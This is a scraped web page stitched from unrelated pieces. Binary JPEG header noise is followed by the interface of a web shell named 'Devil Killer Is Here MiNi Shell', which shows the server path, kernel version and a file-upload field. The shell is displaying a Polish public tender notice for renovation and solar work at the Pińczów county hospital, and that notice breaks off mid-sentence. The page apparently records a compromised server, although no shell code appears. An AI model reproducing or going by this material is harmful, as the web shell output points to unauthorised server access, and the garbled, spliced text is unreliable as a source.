JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240628/0038793901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozwój i modernizacja infrastruktury budowlanej i sprzętowej szpitala powiatowego w Pińczowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Pińczowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009432</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zacisze</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pińczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">413576001</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">413576007</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starostwo@pinczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pinczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozwój i modernizacja infrastruktury budowlanej i sprzętowej szpitala powiatowego w Pińczowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-04a4725c-3526-11ef-acf6-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00387939</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00050840/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozwój i modernizacja infrastruktury budowlanej i sprzętowej szpitala powiatowego w Pińczowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-04a4725c-3526-11ef-acf6-4e696a6d8c25 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej za pomocą platformy www.ezamowienia.gov.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>W przypadku niniejszego postępowania oferta, oświadczenie o braku podstaw do wykluczenia z postępowania i oświadczenie o spełnieniu warunków udziału muszą być złożone pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym; zgodnie z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w regulaminie e-zamowienia – na stronie UPZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować:<br/>	poprzez pocztę elektroniczną pod adresem iod@pinczow.net,<br/>	listownie - kierując korespondencję na adres siedziby administratora.<br/>2.	Z Inspektorem Ochrony Danych można kontaktować się w sprawach dotyczących przetwarzania danych osobowych przez Administratora oraz korzystania z praw związanych z przetwarzaniem danych.<br/>3.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego oraz wykonaniem umowy oraz realizacji i monitoringu &lt; rozwój i modernizacja infrastruktury budowlanej i sprzętowej szpitala powiatowego w Pińczowie &gt;zgodnie z wytycznymi a podstawę prawną ich przetwarzania stanowi ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z p.zm.) oraz rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń , jakich może żądać Zamawiający od wykonawcy (Dz.U. z 2020r. poz 2415).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PiPR.IV.272.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1894308,94 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja robót budowlano instalacyjnych obejmujących wykonanie prac remontowych w oddziale chorób wewnętrznych wraz z budową instalacji fotowoltaicznej o mocy 10 kW i wykonaniem prac remontowych wejścia głównego do szpitala.<br/>2.	Szczegółowy opis i zakres przedmiotu zamówienia określony został w załącznikach do niniejszej specyfikacji:<br/>2.1. opisie przedmiotu zamówienia :<br/>	załącznik nr 10A- wykonanie prac remontowych w oddziale chorób wewnętrznych; <br/>	załącznik nr 10B- budowa instalacji fotowoltaicznej o mocy 10 kW; <br/> załącznik nr 10C- wykonanie prac remontowych wejścia głównego.<br/>2.2.	projekcie umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215140-0 - Roboty budowlane w zakresie obiektów szpitalnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45432000-4 - Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian</p> <p class="mb-0">45442000-7 - Nakładanie powierzchni kryjących</p> <p class="mb-0">45215140-0 - Roboty budowlane w zakresie obiektów szpitalnych</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2.	Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów określonych w kryteriach.<br/>3.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej ilości przyznanych punktów, wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>5.	W toku oceny ofert Zamawiający poprawi oczywiste omyłki pisarskie i oczywiste omyłki rachunko-we, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek oraz inne omyłki, polega-jące na niezgodności oferty z SWZ, niepowodujące istotnych zmian w treści oferty, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona (wg zasad określonych w art. 223 ustawy Pzp). Jeżeli Wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodzi się na poprawienie omyłki polegającej na niezgodności oferty z SWZ, niepowodującej istotnych zmian w treści oferty, Zamawiający odrzuci ofertę tego Wykonawcy.<br/>6.	Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>7.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę , którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>8.	W przypadku braku zgody, o której mowa w ust.7, oferta podlega odrzuceniu, a Zamawiający zwraca sią o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba, że zachodzą przesłanki do unieważnienia postępowania.<br/>Cena brutto<br/>Liczba punktów = Cn/Cb x 60<br/>gdzie:<br/> -Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/> - Cb – cena oferty badanej<br/> - 60 - wskaźnik stały<br/><br/>Wydłużony okres udzielonej gwarancji i rękojmi na wykona-nie przedmiotu zamówienia <br/>Za udzielenie gwarancji na okres:<br/> poniżej 24 miesięcy, oferta zostanie odrzucona<br/>•	24 miesięcy, Wykonawca otrzyma – 0 pkt.<br/>•	36 miesięcy, Wykonawca otrzyma – 20pkt.<br/>Informację należy wskazać w formularzu ofertowym.<br/>W przypadku, gdy którykolwiek z Wykonawców zaoferuje wyższą licz-bę miesięcy niż 36, do obliczeń zostanie przyjęta liczba 36 miesięcy. W przypadku, gdy którykolwiek z Wykonawców zaoferuje w Formularzu oferty niższą liczbę miesięcy niż 24, jego oferta zostanie uznana za nie-zgodną z SWZ i zostanie odrzucona zgodnie z ustawą Pzp. Jeżeli który-kolwiek z Wykonawców nie wskaże w Formularzu oferty żadnego okresu gwarancji, Zamawiający na potrzeby oceny ofert przyjmie minimalny okres gwarancji, tj. 24 miesięcy i oferta otrzyma 0 punktów w tym kryte-rium.<br/><br/>Skrócony okres realizacji przedmiotu zamówienia <br/>Zamawiający wymaga terminu realizacji: 160 dni od dnia podpi-sania umowy.<br/>Wykonawca może określić termin krótszy za który uzyska: <br/>•	160 dni – 0 pkt.<br/>•	150 dni – 20pkt.<br/>Informację należy wskazać w formularzu ofertowym.<br/>W przypadku braku wskazania terminu w formularzu ofertowym Za-mawiający przyjmie realizacje w terminie 160 dni.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużony okres udzielonej gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony okres realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.	złożą ważną ofertę wraz załącznikami, spełniającą wymagania ogłoszenia i SWZ,<br/>2. nie podlegają wykluczeniu na zasadach określonych w Rozdziale VI SWZ,<br/>3.	spełniają poniżej określone warunki udziału w postępowaniu. Ocena zostanie dokonana na zasadzie spełnia – nie spełnia. <br/>3.1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia szczególnych warunków w tym zakresie. Ocena tego kryterium zostanie dokonana na podstawie Oświadczenia o spełnianiu warunków udziału w postępowaniu. <br/><br/>3.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika <br/> to z odrębnych przepisów. <br/>Zamawiający nie stawia warunków w tym zakresie. <br/>3.3.	zdolności technicznej lub zawodowej rozumianej jako:<br/>3.3.1.	dysponowanie doświadczeniem<br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz robót budowlanych wykonanych nie <br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał zgodnie z zasadami sztuki budowlanej co najmniej jedno zamówienie polegające na:<br/>	rozbudowie /modernizacji /remoncie o wartości zamówienia co najmniej 1000 000,00zł brutto, którego zakres obejmował roboty ogólnobudowlane -wykończeniowe, wodno-kanalizacyjne, elektryczne; realizowane na czynnym obiekcie opieki zdrowotnej lub spo-łecznej (szpitala / domu pomocy społecznej) tj. w trakcie bieżącego funkcjonowania; <br/>	budowie w obiekcie użyteczności publicznej instalacji fotowoltaicznej o wartości mini-mum 100 000,00 zł brutto,<br/>Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej dotyczący wy-konanych robót musi być spełniony: - przez Wykonawcę samodzielnie lub - przez minimum jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę) samodzielnie; - w przypadku Wykonawców występujących wspólnie, samodzielnie przez minimum jednego z Wykonawców występujących wspólnie. Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego do-świadczenia w ramach doświadczenia różnych podmiotów zaangażowanych w realizację zamó-wienia. W sytuacji, gdy Wykonawca polega na doświadczeniu grupy Wykonawców, której był członkiem (np. konsorcjum), doświadczenie będzie oceniane w zależności od konkretnego zakre-su udziału tego Wykonawcy, a więc jego faktycznego wkładu w prowadzenie działań, które były wymagane od tej grupy w ramach zamówienia publicznego wykazanego na potwierdzenie speł-niania warunku udziału w postępowaniu.<br/><br/>3.3.2.	dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia publicznego w zakresie wykonawczym:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje / będzie dys-ponował:<br/>	1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji w budownictwie polegają-cych na kierowaniu budową lub innymi robotami budowlanymi w specjalności konstrukcyjno – budowlanej, bez ograniczeń, pełniącej funkcję kierownika budowy;<br/>	1 osobą - uprawnionym instalatorem, posiadającym <br/>	ważny certyfikat potwierdzający kwalifikacje do instalowania odnawialnych źródeł energii <br/>lub<br/>	ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, insta-lacji i sieci <br/>Na potwierdzenie w/w warunku należy dołączyć do oferty - załącznik nr 5 <br/>Zamawiający zastrzega, iż w celu spełnienia warunku udziału w postępowaniu w zakresie posiadania zdolności technicznej i zawodowej dopuszcza zgodnie z przepisami ustawy Prawo budowlane oraz Rozporządzenie Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie uprawnienia równoważne, wydane na podstawie wcześniej obowiązujących przepisów. <br/>Zgodnie z art. 12a Prawa budowlanego który to odsyła do ustawy z dnia 22 grudnia 2015 r. o zasa-dach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020 r. poz. 220) przynależność do właściwej izby samorządu zawodowego nie jest wyma-gana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania upraw-nień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależność do izby samorządu zawodowego.<br/><br/>3.4.	sytuacji ekonomicznej i finansowej rozumianej jako:<br/>3.4.1.	posiadanie ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia z sumą gwarancyjną minimum 500 000,00 zł wraz po-twierdzeniem terminowego uiszczenia składki ubezpieczeniowej,<br/>3.4.2.	posiadanie przez Wykonawcę środków finansowych/zdolności kredytowej na poziomie mini-mum 1 000 000,00zł (jeden milion zł) pozostających w dyspozycji Wykonawcy, <br/>3.4.3.	ocena spełniania warunku ubezpieczenia zostanie dokonana na podstawie załączonego przez Wykonawcę dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzial-ności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarantowanej tego ubezpieczenia;<br/>	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (w szczegól-ności członkowie konsorcjum, wspólnicy spółki cywilnej) ubezpieczenie winien posiadać każ-dy w wykonawców występujących wspólnie z zastrzeżeniem, iż suma gwarancyjna każdej po-lisy nie może być niższa niż 200 000,00 zł i łączna wartość polis Wykonawców występujących wspólnie nie niższa niż 500 000,00 zł lub wszyscy wykonawcy ubezpieczeni łącznie w ramach jednej polisy której suma gwarancyjna nie może być niższa niż 500 000,00 zł;<br/>3.4.4.	ocena spełniania warunku zdolności finansowych zostanie dokonana na podstawie informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada ra-chunek, w okresie nie wcześniejszym niż 1 miesiąc przed terminem otwarcia ofert;<br/>	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (w szczegól-ności członkowie konsorcjum, wspólnicy spółki cywilnej) środki finansowe lub zdolność kre-dytową może posiadać jeden z wykonawców występujących wspólnie lub wykonawcy wspól-nie ubiegający się o udzielenie zamówienia łącznie;<br/><br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez 